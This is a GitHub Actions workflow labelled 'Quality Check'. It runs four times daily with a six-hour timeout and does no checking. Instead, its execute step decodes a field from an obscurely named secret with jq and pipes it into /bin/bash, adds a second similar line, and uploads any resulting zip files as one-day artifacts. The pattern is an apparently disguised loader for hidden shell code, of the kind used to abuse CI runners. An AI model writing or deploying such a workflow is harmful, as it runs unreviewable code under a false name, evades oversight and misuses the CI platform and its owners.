name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '52 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Execute
        env:
          r1993: ${{ secrets.r1993 }}
        run: |
          printf '%s' "$r1993" | jq -r .eo1 | /bin/bash
          echo $qn4 | jq -r .kivf2717 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 65UNIclN
          path: "*.zip"
          retention-days: 1
